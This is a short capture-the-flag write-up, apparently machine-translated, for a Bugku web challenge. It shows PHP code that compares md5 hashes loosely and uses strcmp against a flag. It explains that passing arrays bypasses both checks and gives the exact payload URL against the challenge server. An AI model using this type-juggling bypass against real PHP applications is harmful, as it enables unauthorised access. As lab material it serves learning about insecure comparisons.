Bugkuctf-web24 (problem solving ideas and steps)

Look at the question

Look everywhere for , No additional information

Grab the bag

Find out “ link ” There is a hidden in that place a label , Click the jump , Get the code

Analysis of the code

<?php
if(isset($_GET['v1']) && isset($_GET['v2']) && isset($_GET['v3'])){
    
    $v1 = $_GET['v1'];
    $v2 = $_GET['v2'];
    $v3 = $_GET['v3'];
    if($v1 != $v2 && md5($v1) == md5($v2)){
    
        if(!strcmp($v3, $flag)){
    
            echo $flag;
        }
    }
}
?>

Follow again md5 of , In fact, I have written an article before
https://blog.csdn.net/weixin_45254208/article/details/115425962
But not only to meet md5, Also make variables $ v3 It's equal to the variable $ flag,strcmp Unrecognized array , Go straight back to 0, It seems , All three variables can be used to construct an array to bypass

structure payload

http://114.67.246.176:17268/?v1[]=1&v2[]=2&v3[]=3

OK, Out flag 了